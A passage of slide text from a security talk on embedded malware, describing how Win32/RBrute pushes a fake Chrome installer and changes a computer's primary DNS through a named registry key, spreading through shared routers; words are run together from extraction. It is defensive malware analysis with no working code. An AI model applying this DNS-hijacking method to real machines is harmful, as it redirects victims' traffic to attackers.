![Page 90: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/90.jpg)
Win32/RBruteNextStepSimpleredirectiontofakeChromeinstaller(facebookorgoogledomains)Install(useractionrequired)ChangeprimaryDNSonthecomputer(viakeyregistry)
HKLM/SYSTEM/ControlSet001/Services/Tcpip/Parameters/Interfaces/{networkinterfaceUUID}/NameServer
![Page 91: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/91.jpg)
WhyreinfectsomeonebyRBruteandnotSality?
![Page 92: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/92.jpg)
Win32/RBruteInACoffeeShop
InfecteduserInfectedrouterEveryoneisinfected
![Page 93: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/93.jpg)
RBruteandSality
![Page 94: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/94.jpg)
ConclusionEmbeddedmalware
NotyetcomplexToolsandprocessesneedtocatchupalowhangingfruitPreventionsimple
![Page 95: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/95.jpg)
Thanks!Thankyou!SpecialthankstoESETCanadaResearchTeam
![Page 96: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/96.jpg)
Questions?Questions?
@obilodeau@nyx__o
![Page 97: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/97.jpg)
Referenceshttp://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdfhttp://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.htmlhttps://gist.github.com/josephwegner/1d20f1ce1d59b61172e1http://www.welivesecurity.com/2014/04/02/win32sality-newest-component-a-routers-primary-dns-changer-named-win32rbrute/